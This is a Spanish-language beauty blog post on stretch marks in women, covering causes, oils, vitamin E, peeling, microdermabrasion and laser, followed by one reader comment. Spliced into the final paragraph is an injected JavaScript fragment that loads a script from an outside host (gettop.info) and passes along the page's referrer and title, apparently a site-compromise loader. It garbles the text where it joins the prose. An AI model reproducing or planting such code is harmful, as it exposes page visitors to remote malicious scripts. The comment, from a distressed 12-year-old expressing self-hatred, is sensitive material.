Salud y belleza » Belleza, Salud

Mujeres vs. Estrías

1 Comentario

estrias

“Las mujeres son de Venus y los hombres de Marte”. No se necesita ser un erudito en la materia Astrología para comprender esa frase: solo basta con tener una pizca de roce social y un poco de sentido común.

Las mujeres piensan diferente y actúan diferente sencillamente porque, al fin y al cabo, “son diferentes” (hurra por esa diversidad). Es lógico entonces que, en el día a día, ellas deban lidiar con una serie de enemigos y problemas que los hombres jamás conocerán: las estrías, por ejemplo. Vale mencionar que si bien existe un pequeño porcentaje de hombres que sufren este mal, no se compara con la cantidad de mujeres que lo padece: la ecuación inversa ocurre, por ejemplo, con la calvicie (es lo que venimos tratando de decir: ¡Venus y Marte no tienen la misma superficie!).

“Las estrías son marcas en forma de líneas equivalentes a cicatrices que aparecen en la piel, comúnmente en la región del abdomen, las mamas, los glúteos, los muslos, las rodillas y brazos. Las estrías son producidas por la ruptura del tejido debido al estiramiento excesivo de la piel. El color de éstas puede variar de blanco a rosado o, inclusive, amarronado. Diversas circunstancias a las que son sometidas las mujeres, como el embarazo, pueden traer este problema. Claro que muchas otras circunstancias también favorecen el surgimiento de esas cicatrices: desde problemas hormonales, hasta estrés o tratamientos con corticoides.

Las estrías no significan un problema para la salud, pero sí son una molestia desde el punto de vista estético principalmente porqué son difíciles de eliminar”. La palabra de un especialista despeja cualquier duda: las estrías son un enemigo tan complicado como popular entre las mujeres.

Pero existen diferentes técnicas que pueden ayudar a hacerlas desaparecer. Dentro de los métodos naturales se destacan dos:

1) la aplicación de masajes con aceites vegetales y

2) el consumo –siempre previa consulta con el medico- de cápsulas de vitamina E para fomentar a la regeneración de tejidos en el organismo.

Luego, por supuesto, encontramos tratamientos un tanto más elaborados como el famoso “peeling” (aplicación de productos que van descamando las capas superficiales de la piel, tratamiento que  también se usa para combatir el acné), la microdermoabrasión (técnica mediante la cual, a partir de “micro-cristales” se van puliendo las capas de la piel y aspirando las células viejas) y el “láser” que, como no podía ser de otra manera, significa riesgos más serios para el físico.
Por último, lógicamente, también pueden hallarse en el mercado y con facilidad productos estéticos útiles para esconder las estrías: la mayoría de ellos son en forma de cremas o ungüentos.

En fin, estas son algunas de las características que presentan “los/las habitantes” del planeta Venus. En Marte, en cambio, las cosas son diferentes: todos los hombres que viven allí han afirmado que no les importa lo que las mujeres ha dado en denominar “estrías” pues, a pesar de esas marcas, ellas siguen siendo el espécimen más bonito de la galaxia entera.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

One Comment »

  • carolina said:

    buenas soy una chica de 12 años,tengo mucho miedo me salieron estrias en el brazo nose que hace me odio y me quiero a la vez

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.